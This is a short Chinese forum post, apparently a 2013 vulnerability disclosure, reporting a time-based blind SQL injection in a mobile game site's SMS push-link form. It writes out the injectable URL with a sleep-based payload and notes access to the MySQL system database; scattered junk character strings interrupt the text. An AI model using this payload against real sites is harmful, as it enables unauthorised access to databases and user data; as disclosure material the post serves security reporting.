简要描述:. R9 S5 Y- V& S. f) f5 e) B
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。6 k' I5 U! D7 {0 D4 \
& z$ ]/ q3 z u J6 c' W" I
详细说明:& @% U( @- l" H
存在SQL盲注url:
6 g/ Q1 \) {2 a* Efenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1$ ^0 v2 W0 s/ @0 [
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
. Z# D% W) u: i& N& zhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png/ x# K# G( P# }. {. g
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
% @+ R. g4 Y0 u& _3 T$ i& q& }% l, P* ` a4 u
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对